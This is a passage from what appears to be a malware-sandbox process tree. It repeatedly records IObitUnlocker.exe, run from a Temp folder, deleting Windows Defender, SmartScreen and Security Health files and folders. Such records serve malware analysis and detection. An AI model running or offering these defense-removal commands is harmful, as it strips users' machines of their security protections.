Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:9476
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9596
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10208
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10184
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8228
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 